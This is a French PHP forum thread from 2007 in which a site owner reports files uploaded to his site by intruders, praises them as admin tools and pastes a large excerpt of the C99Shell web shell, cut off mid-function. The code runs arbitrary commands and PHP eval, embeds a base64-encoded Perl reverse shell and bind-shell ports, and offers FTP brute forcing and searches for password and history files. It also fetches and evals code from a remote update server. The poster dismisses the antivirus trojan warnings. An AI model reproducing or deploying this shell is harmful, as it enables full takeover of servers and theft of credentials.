hacking? à quoi servent ces fichiers php uploadés sur mon site?

hacking? à quoi servent ces fichiers php uploadés sur mon site? - PHP - Programmation

Marsh Posté le 16-11-2007 à 16:28:54    

Bonjour!

 

Des fichiers ont été uploadés sur mon site, via la galerie coppermine.

 

xxx

 

trop tard je vire les liens et les fichiers,
je les ai testé, et il s'agit de véritables outils de hackers pour prendre le contrôle plus que total d'un site, voire du serveur si il n'est pas sécurisé!

 

En tout cas bravo à ceux qui ont fait ça car techniquement, je n'ai jamais pu trouver de logiciels aussi complets et efficaces pour la gestion de site en ligne!
(on peut même envoyer un mail à ceux qui ont fait ça, une team russe...)

 

c'est super on peut tout faire avec, depuis le temps que je cherchais ça! (pour administrer simplement mon site)

 

bon bien sûr c'est moins cool quand c'est un hacker qui l'utilise sur le site de qqn d'autre,
mais je peux les utiliser pour moi quand meme lol!

 

PS: ils sont tous deux reconnus comme chevaux de troie par les antivirus puisqu'ils utilisent des backdoors et autre failles de sécurité... pas bieeeeen! c'est la galère pour calmer l'antivirus mais bon^^

 

Pour ceux que ça intéresse de voir du code bien fait en php, voire de récupérer les fichiers, je ne serai pas egoïste et je mes le code ici,
pour plus d'infos contactez la team russe... tout est dans les fichiers! (en anglais par contre)


Message édité par le_phoenix le 16-11-2007 à 19:54:20
Reply

Marsh Posté le 16-11-2007 à 16:28:54   

Reply

Marsh Posté le 16-11-2007 à 16:49:21    

NOD32 me sort ca pour ton jpg :
16/11/2007 16:47:53 HTTP filter file http://www.all-crash.fr/galerie/al [...] sp_php.jpg PHP/Hacktool.Haxplorer.B trojan connection terminated - quarantined  Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
 
:heink: :heink: :heink:


---------------
We deserve everything that's coming...
Reply

Marsh Posté le 16-11-2007 à 16:53:02    

Voici le "Trojan Horse PHP/BackDoor.C99Shell" (qui porte bien son nom) qui se trouve être un superbe outil d'administration de site! (il se trouvait dans un fichier txt uploadé par un anonyme sur mon site)
J'aimerais juste être sûr qu'il ne communique pas d'infos à l'extérieur : qqn peut-il vérifier ça?

 

[cpp]<?php
//Starting calls
ini_set("max_execution_time",0);
if (!function_exists("getmicrotime" )) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
$adires="";
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips" )) {function strips(&$arr,$k="" ) {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS" ) {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

 

$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl" ); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}

 

$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

 

if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING" )) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\" ) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
 $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

 

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

 

//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

 

$host_allow = array("*" ); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1" )
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

 

$gzipencode = TRUE; //Encode with gzip?

 

$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

 

$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server

 

$filestealth = TRUE; //if TRUE, don't change modify- and access-time

 

$donated_html = "<center><b>C </b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array("" ); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

 

$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT" );
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

 

$log_email = "user@host.tld"; //Default e-mail for sending logs

 

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

 

// Registered file-types.
//  array(
//   "{action1}"=>array("ext1","ext2","ext3",...),
//   "{action2}"=>array("ext4","ext5","ext6",...),
//   ...
//  )
$ftypes  = array(
 "html"=>array("html","htm","shtml" ),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess" ),
 "exe"=>array("sh","install","bat","cmd" ),
 "ini"=>array("ini","inf" ),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl" ),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg" ),
 "sdb"=>array("sdb" ),
 "phpsess"=>array("sess" ),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar" )
);

 

// Registered executable file-types.
//  array(
//   string "command{i}"=>array("ext1","ext2","ext3",...),
//   ...
//  )
//   {command}: %f% = filename
$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
if (empty($dizin)) {$dizin = realpath("." );} elseif(realpath($dizin)) {$dizin = realpath($dizin);}
$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;}
$dizin = str_replace("\\\\","\\",$dizin);
$dizinispd = htmlspecialchars($dizin);
/*dizin*/
$real = realpath($dizinispd);
$path = basename ($PHP_SELF);
function dosyayicek($link,$file)
{
   $fp = @fopen($link,"r" );
   while(!feof($fp))
   {
       $cont.= fread($fp,1024);
   }
   fclose($fp);

 

  $fp2 = @fopen($file,"w" );
   fwrite($fp2,$cont);
   fclose($fp2);
}

  


$exeftypes  = array(
 getenv("PHPRC" )." -q %f%" => array("php","php3","php4" ),
 "perl %f%" => array("pl","cgi" )
);

 

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. "<b>" (default)
  string {closetag} - close html-tag, e.g. "</b>" (default)
  bool {break} - if TRUE and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>" ), // example
  array("config.php",1) // example
);

 

$safemode_diskettes = array("a" ); // This variable for disabling diskett-errors.
 // array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z" );
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

 

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

 

$bindport_pass = "c99";  // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

 

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "ls -la" ),
  array("find all suid files", "find / -type f -perm -04000 -ls" ),
  array("find suid files in current dir", "find . -type f -perm -04000 -ls" ),
  array("find all sgid files", "find / -type f -perm -02000 -ls" ),
  array("find sgid files in current dir", "find . -type f -perm -02000 -ls" ),
  array("find config.inc.php files", "find / -type f -name config.inc.php" ),
  array("find config* files", "find / -type f -name \"config*\"" ),
  array("find config* files in current dir", "find . -type f -name \"config*\"" ),
  array("find all writable folders and files", "find / -perm -2 -ls" ),
  array("find all writable folders and files in current dir", "find . -perm -2 -ls" ),
  array("find all service.pwd files", "find / -type f -name service.pwd" ),
  array("find service.pwd files in current dir", "find . -type f -name service.pwd" ),
  array("find all .htpasswd files", "find / -type f -name .htpasswd" ),
  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd" ),
  array("find all .bash_history files", "find / -type f -name .bash_history" ),
  array("find .bash_history files in current dir", "find . -type f -name .bash_history" ),
  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc" ),
  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc" ),
  array("list file attributes on a Linux second extended file system", "lsattr -va" ),
  array("show opened ports", "netstat -an | grep -i listen" )
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir" ),
  array("show opened ports", "netstat -an" )
 );
}

 

$sess_cookie = "c99shvars"; // Cookie-variable name

 

$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting

 

//Quick launch
$quicklaunch = array(
 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)" ),
 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)" ),
 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort" ),
 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","" ),
 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d" ),
 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d" ),
 array("<b>Encoder</b>",$surl."act=encoder&d=%d" ),
 array("<b>Tools</b>",$surl."act=tools&d=%d" ),
 array("<b>Proc.</b>",$surl."act=processes&d=%d" ),
 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d" ),
 array("<b>Sec.</b>",$surl."act=security&d=%d" ),
 array("<b>SQL</b>",$surl."act=sql&d=%d" ),
 array("<b>PHP-code</b>",$surl."act=eval&d=%d" ),
 array("<b>Update</b>",$surl."act=update&d=%d" ),
 array("<b>Feedback</b>",$surl."act=feedback&d=%d" ),
 array("<b>Self remove</b>",$surl."act=selfremove" ),
 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()" )
);

 

//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

 

@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);

 

//END CONFIGURATION

 


// \/Next code isn't for editing\/
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r" )))
  {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
function which($pr)
{
$path = ex("which $pr" );
if(!empty($path)) { return $path; } else { return $pr; }
}

 

function cf($fname,$text)
{
 $w_file=@fopen($fname,"w" ) or err(0);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';    
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp)." )$!i";
if (!preg_match($s,getenv("REMOTE_ADDR" )) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR" )))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR" )." ) not allow" );}
if (!empty($login))
{
 if (empty($md5_pass)) {$md5_pass = md5($pass);}
 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 {
  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"" );
  header("HTTP/1.0 401 Unauthorized" );
  exit($accessdeniedmess);
 }
}
if ($act != "img" )
{
$lastdir = realpath("." );
chdir($curdir);
if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

 

$disablefunc = @ini_get("disable_functions" );
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}

 

if (!function_exists("c99_buff_prepare" ))
{
function c99_buff_prepare()
{
 global $sess_data;
 global $act;
 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 $sess_data["copy"] = array_unique($sess_data["copy"]);
 $sess_data["cut"] = array_unique($sess_data["cut"]);
 sort($sess_data["copy"]);
 sort($sess_data["cut"]);
 if ($act != "copy" ) {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists("c99_sess_put" ))
{
function c99_sess_put($data)
{
 global $sess_cookie;
 global $sess_data;
 c99_buff_prepare();
 $sess_data = $data;
 $data = serialize($data);
 setcookie($sess_cookie,$data);
}
}
foreach (array("sort","sql_sort" ) as $v)
{
 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save)
{
 if (!empty($sort)) {setcookie("sort",$sort);}
 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini" ))
{
function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
}
if (!function_exists("view_size" ))
{
function view_size($size)
{
 if (!is_numeric($size)) {return FALSE;}
 else
 {
  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  else {$size = $size . " B";}
  return $size;
 }
}
}
if (!function_exists("fs_copy_dir" ))
{
function fs_copy_dir($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != "." ) and ($o != ".." ))
  {
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return TRUE;
}
}
if (!function_exists("fs_copy_obj" ))
{
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_copy_dir($d,$t);
 }
 elseif (is_file($d)) {return copy($d,$t);}
 else {return FALSE;}
}
}
if (!function_exists("fs_move_dir" ))
{
function fs_move_dir($d,$t)
{
 $h = opendir($d);
 if (!is_dir($t)) {mkdir($t);}
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != "." ) and ($o != ".." ))
  {
   $ret = TRUE;
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return TRUE;
}
}
if (!function_exists("fs_move_obj" ))
{
function fs_move_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_move_dir($d,$t);
 }
 elseif (is_file($d))
 {
  if(copy($d,$t)) {return unlink($d);}
  else {unlink($t); return FALSE;}
 }
 else {return FALSE;}
}
}
if (!function_exists("fs_rmdir" ))
{
function fs_rmdir($d)
{
 $h = opendir($d);
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != "." ) and ($o != ".." ))
  {
   if (!is_dir($d.$o)) {unlink($d.$o);}
   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  }
 }
 closedir($h);
 rmdir($d);
 return !is_dir($d);
}
}
if (!function_exists("fs_rmobj" ))
{
function fs_rmobj($o)
{
 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 if (is_dir($o))
 {
  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  return fs_rmdir($o);
 }
 elseif (is_file($o)) {return unlink($o);}
 else {return FALSE;}
}
}
if (!function_exists("myshellexec" ))
{
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec" ) and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system" ) and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru" ) and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r" )))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
if (!function_exists("tabsort" )) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
if (!function_exists("view_perms" ))
{
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}

 

$owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["execute"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["execute"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["execute"] = ($mode & 00001)?"x":"-";

 

if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x" )?"s":"S";}
 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x" )?"s":"S";}
 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x" )?"t":"T";}

 

return $type.join("",$owner).join("",$group).join("",$world);
}
}
if (!function_exists("posix_getpwuid" ) and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
if (!function_exists("posix_getgrgid" ) and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
if (!function_exists("posix_kill" ) and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
if (!function_exists("parse_perms" ))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if (!function_exists("parsesort" ))
{
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d" ) {$second = "a";}
 return array($one,$second);
}
}
if (!function_exists("view_perms_color" ))
{
function view_perms_color($o)
{
 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
}
}
if (!function_exists("c99getsource" ))
{
function c99getsource($fn)
{
 global $c99sh_sourcesurl;
 $array = array(
  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
 );
 $name = $array[$fn];
 if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
 else {return FALSE;}
}
}
if (!function_exists("c99sh_getupdate" ))
{
function c99sh_getupdate($update = TRUE)
{
 $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0" )."&";
 $data = @file_get_contents($url);
 if (!$data) {return "Can't connect to update-server!";}
 else
 {
  $data = ltrim($data);
  $string = substr($data,3,ord($data{2}));
  if ($data{0} == "\x99" and $data{1} == "\x01" ) {return "Error: ".$string; return FALSE;}
  if ($data{0} == "\x99" and $data{1} == "\x02" ) {return "You are using latest version!";}
  if ($data{0} == "\x99" and $data{1} == "\x03" )
  {
   $string = explode("\x01",$string);
   if ($update)
   {
    $confvars = array();
    $sourceurl = $string[0];
    $source = file_get_contents($sourceurl);
    if (!$source) {return "Can't fetch update!";}
    else
    {
     $fp = fopen(__FILE__,"w" );
     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
    }
   }
   else {return "New version are available: ".$string[1];}
  }
  elseif ($data{0} == "\x99" and $data{1} == "\x04" ) {eval($string); return 1;}
  else {return "Error in protocol: segmentation failed! (".$data." ) ";}
 }
}
}
if (!function_exists("mysql_dump" ))
{
function mysql_dump($set)
{
 global $shver;
 $sock = $set["sock"];
 $db = $set["db"];
 $print = $set["print"];
 $nl2br = $set["nl2br"];
 $file = $set["file"];
 $add_drop = $set["add_drop"];
 $tabs = $set["tabs"];
 $onlytabs = $set["onlytabs"];
 $ret = array();
 $ret["err"] = array();
 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource." );}
 if (empty($db)) {$db = "db";}
 if (empty($print)) {$print = 0;}
 if (empty($nl2br)) {$nl2br = 0;}
 if (empty($add_drop)) {$add_drop = TRUE;}
 if (empty($file))
 {
  $file = $tmpdir."dump_".getenv("SERVER_NAME" )."_".$db."_".date("d-m-Y-H-i-s" ).".sql";
 }
 if (!is_array($tabs)) {$tabs = array();}
 if (empty($add_drop)) {$add_drop = TRUE;}
 if (sizeof($tabs) == 0)
 {
  // retrive tables-list
  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 }
 $out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# MySQL version: (".mysql_get_server_info()." ) running on ".getenv("SERVER_ADDR" )." (".getenv("SERVER_NAME" )." )"."
# Date: ".date("d.m.Y H:i:s" )."
# DB: \"".$db."\"
#---------------------------------------------------------
";
 $c = count($onlytabs);
 foreach($tabs as $tab)
 {
  if ((in_array($tab,$onlytabs)) or (!$c))
  {
   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
   // recieve query for create table structure
   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
   if (!$res) {$ret["err"][] = mysql_smarterror();}
   else
   {
    $row = mysql_fetch_row($res);
    $out .= $row["1"].";\n\n";
    // recieve table variables
    $res = mysql_query("SELECT * FROM `$tab`", $sock);
    if (mysql_num_rows($res) > 0)
    {
     while ($row = mysql_fetch_assoc($res))
     {
      $keys = implode("`, `", array_keys($row));
      $values = array_values($row);
      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
      $values = implode("', '", $values);
      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
      $out .= $sql;
     }
    }
   }
  }
 }
 $out .= "#---------------------------------------------------------------------------------\n\n";
 if ($file)
 {
  $fp = fopen($file, "w" );
  if (!$fp) {$ret["err"][] = 2;}
  else
  {
